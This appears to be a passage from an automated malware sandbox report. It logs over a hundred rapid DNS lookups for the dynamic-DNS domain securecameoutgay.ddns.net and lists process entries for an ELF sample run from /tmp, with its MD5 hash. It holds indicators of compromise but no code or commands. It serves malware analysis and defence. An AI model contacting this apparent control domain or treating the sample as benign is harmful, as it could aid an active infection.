                                                    Oct 12, 2024 23:06:17.761805058 CEST192.168.2.148.8.8.80x941dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.768419981 CEST192.168.2.148.8.8.80x3c6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.774967909 CEST192.168.2.148.8.8.80x3c6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.781447887 CEST192.168.2.148.8.8.80x3c6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.787900925 CEST192.168.2.148.8.8.80x3c6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.794605017 CEST192.168.2.148.8.8.80x3c6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.801234961 CEST192.168.2.148.8.8.80x6699Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.807671070 CEST192.168.2.148.8.8.80x6699Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.814265966 CEST192.168.2.148.8.8.80x6699Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.820848942 CEST192.168.2.148.8.8.80x6699Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.828190088 CEST192.168.2.148.8.8.80x6699Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.834826946 CEST192.168.2.148.8.8.80xf1b9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.841444016 CEST192.168.2.148.8.8.80xf1b9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.848189116 CEST192.168.2.148.8.8.80xf1b9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.854916096 CEST192.168.2.148.8.8.80xf1b9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.861264944 CEST192.168.2.148.8.8.80xf1b9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.868012905 CEST192.168.2.148.8.8.80x83cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.874628067 CEST192.168.2.148.8.8.80x83cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.881267071 CEST192.168.2.148.8.8.80x83cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.888226986 CEST192.168.2.148.8.8.80x83cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.894903898 CEST192.168.2.148.8.8.80x83cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.901907921 CEST192.168.2.148.8.8.80xa657Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.908480883 CEST192.168.2.148.8.8.80xa657Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.914891958 CEST192.168.2.148.8.8.80xa657Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.921547890 CEST192.168.2.148.8.8.80xa657Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.928639889 CEST192.168.2.148.8.8.80xa657Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.935709953 CEST192.168.2.148.8.8.80xb4a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.943054914 CEST192.168.2.148.8.8.80xb4a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.950393915 CEST192.168.2.148.8.8.80xb4a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.957355976 CEST192.168.2.148.8.8.80xb4a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.963920116 CEST192.168.2.148.8.8.80xb4a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.970371962 CEST192.168.2.148.8.8.80x6ba7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.977096081 CEST192.168.2.148.8.8.80x6ba7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.984081984 CEST192.168.2.148.8.8.80x6ba7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.991379976 CEST192.168.2.148.8.8.80x6ba7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.999226093 CEST192.168.2.148.8.8.80x6ba7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.006412029 CEST192.168.2.148.8.8.80xa742Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.013004065 CEST192.168.2.148.8.8.80xa742Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.020028114 CEST192.168.2.148.8.8.80xa742Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.026854038 CEST192.168.2.148.8.8.80xa742Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.033608913 CEST192.168.2.148.8.8.80xa742Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.040343046 CEST192.168.2.148.8.8.80x3a2fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.047213078 CEST192.168.2.148.8.8.80x3a2fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.053823948 CEST192.168.2.148.8.8.80x3a2fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.060754061 CEST192.168.2.148.8.8.80x3a2fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.067456007 CEST192.168.2.148.8.8.80x3a2fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.074315071 CEST192.168.2.148.8.8.80xf69aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.081418037 CEST192.168.2.148.8.8.80xf69aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.088293076 CEST192.168.2.148.8.8.80xf69aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.096369028 CEST192.168.2.148.8.8.80xf69aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.102788925 CEST192.168.2.148.8.8.80xf69aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.109462976 CEST192.168.2.148.8.8.80x502aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.116132975 CEST192.168.2.148.8.8.80x502aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.122951984 CEST192.168.2.148.8.8.80x502aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.129661083 CEST192.168.2.148.8.8.80x502aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.136403084 CEST192.168.2.148.8.8.80x502aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.143759966 CEST192.168.2.148.8.8.80x5853Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.150691032 CEST192.168.2.148.8.8.80x5853Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.157895088 CEST192.168.2.148.8.8.80x5853Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.165154934 CEST192.168.2.148.8.8.80x5853Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.172605991 CEST192.168.2.148.8.8.80x5853Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.180077076 CEST192.168.2.148.8.8.80xcaf4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.186954021 CEST192.168.2.148.8.8.80xcaf4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.194425106 CEST192.168.2.148.8.8.80xcaf4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.201884031 CEST192.168.2.148.8.8.80xcaf4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.209515095 CEST192.168.2.148.8.8.80xcaf4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.217447042 CEST192.168.2.148.8.8.80xac3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.224086046 CEST192.168.2.148.8.8.80xac3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.231709003 CEST192.168.2.148.8.8.80xac3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.239713907 CEST192.168.2.148.8.8.80xac3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.246695042 CEST192.168.2.148.8.8.80xac3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.253544092 CEST192.168.2.148.8.8.80xb22fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.260489941 CEST192.168.2.148.8.8.80xb22fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.267976046 CEST192.168.2.148.8.8.80xb22fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.274665117 CEST192.168.2.148.8.8.80xb22fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.281774044 CEST192.168.2.148.8.8.80xb22fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.288127899 CEST192.168.2.148.8.8.80x2aaaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.294737101 CEST192.168.2.148.8.8.80x2aaaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.301218033 CEST192.168.2.148.8.8.80x2aaaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.307760954 CEST192.168.2.148.8.8.80x2aaaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.315994978 CEST192.168.2.148.8.8.80x2aaaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.323548079 CEST192.168.2.148.8.8.80x267bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.330729961 CEST192.168.2.148.8.8.80x267bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.338460922 CEST192.168.2.148.8.8.80x267bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.345643997 CEST192.168.2.148.8.8.80x267bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.352852106 CEST192.168.2.148.8.8.80x267bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.359237909 CEST192.168.2.148.8.8.80x1da0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.365550995 CEST192.168.2.148.8.8.80x1da0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.372795105 CEST192.168.2.148.8.8.80x1da0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.379811049 CEST192.168.2.148.8.8.80x1da0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.386753082 CEST192.168.2.148.8.8.80x1da0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.393343925 CEST192.168.2.148.8.8.80x2d2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.400121927 CEST192.168.2.148.8.8.80x2d2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.406940937 CEST192.168.2.148.8.8.80x2d2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.414628029 CEST192.168.2.148.8.8.80x2d2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.421730042 CEST192.168.2.148.8.8.80x2d2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.429625034 CEST192.168.2.148.8.8.80xbdf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.436048985 CEST192.168.2.148.8.8.80xbdf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.442538023 CEST192.168.2.148.8.8.80xbdf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.448868036 CEST192.168.2.148.8.8.80xbdf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.456348896 CEST192.168.2.148.8.8.80xbdf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.462852955 CEST192.168.2.148.8.8.80x8de9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.469213963 CEST192.168.2.148.8.8.80x8de9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.475641966 CEST192.168.2.148.8.8.80x8de9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.482050896 CEST192.168.2.148.8.8.80x8de9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.488782883 CEST192.168.2.148.8.8.80x8de9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.495476007 CEST192.168.2.148.8.8.80x86b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.501960993 CEST192.168.2.148.8.8.80x86b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.508354902 CEST192.168.2.148.8.8.80x86b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.514899969 CEST192.168.2.148.8.8.80x86b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.521744013 CEST192.168.2.148.8.8.80x86b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.528191090 CEST192.168.2.148.8.8.80x1715Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.534969091 CEST192.168.2.148.8.8.80x1715Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.541610956 CEST192.168.2.148.8.8.80x1715Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.547969103 CEST192.168.2.148.8.8.80x1715Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:18.554414034 CEST192.168.2.148.8.8.80x1715Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false

                                                    System Behavior

                                                    Start time (UTC):21:05:01
                                                    Start date (UTC):12/10/2024
                                                    Path:/tmp/jYEvdBHMOI.elf
                                                    Arguments:/tmp/jYEvdBHMOI.elf
                                                    File size:4379400 bytes
                                                    MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                                    Start time (UTC):21:05:01
                                                    Start date (UTC):12/10/2024
                                                    Path:/tmp/jYEvdBHMOI.elf
                                                    Arguments:-
                                                    File size:4379400 bytes
                                                    MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                                    Start time (UTC):21:05:01
                                                    Start date (UTC):12/10/2024
                                                    Path:/tmp/jYEvdBHMOI.elf
                                                    Arguments:-
                                                    File size:4379400 bytes
                                                    MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                                    Start time (UTC):21:05:01
                                                    Start date (UTC):12/10/2024
                                                    Path:/tmp/jYEvdBHMOI.elf
                                                    Arguments:-
                                                    File size:4379400 bytes
                                                    MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                                    Start time (UTC):21:05:01
                                                    Start date (UTC):12/10/2024
                                                    Path:/tmp/jYEvdBHMOI.elf
                                                    Arguments:-
                                                    File size:4379400 bytes
                                                    MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e